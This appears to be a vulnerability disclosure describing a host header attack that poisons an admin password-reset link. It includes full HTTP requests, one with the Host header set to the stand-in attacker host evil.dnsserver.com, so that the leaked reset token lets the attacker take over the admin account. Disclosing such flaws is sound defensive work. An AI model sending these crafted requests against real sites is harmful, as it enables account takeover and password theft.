Summary:
Administrator Password Reset Poisoning by host header attack
Detailed Description:
the forget password function only needs the user name to generate the reset
password link to the user'email.The following POST request is the normal
request.
POST /admin/login.php HTTP/1.1
Host: Host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/admin/login.php?forgotpw=1
Cookie: [removed]
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 57
forgottenusername=admin&forgotpwform=1&loginsubmit=Submit
This is the a normal reset password link:
http://Host/admin/login.php?recoverme=b18c6cc54432d97a1a7f28c6103b5b58
But the reset password link's host is come from the forget password POST
request. It means that if we change the host header of the request, the reset
password link's host will be change.
so if the attacker konws the administrator'name and change the change the host
header of the request. when the admin click the link, the attacker will be know
the token of recoverme. For example:
1. the attcker change the host header of the request to his dns server which is
evil.dnsserver.com
POST /admin/login.php HTTP/1.1
Host: evil.dnsserver.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/admin/login.php?forgotpw=1
Cookie: [removed]
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 57
forgottenusername=admin&forgotpwform=1&loginsubmit=Submit
2. then the admin will receive the password reset link as follow:
http://evil.dnsserver.com/admin/login.php?recoverme=b18c6cc54432d97a1a7f28c6103b5b58
3. when the admin click the reset password link, the attacker will receive the
request from the admin, and the attacker will get the value of recoverme. Then
the attacker can make up a true reset password link with the true host and can
change the admin's password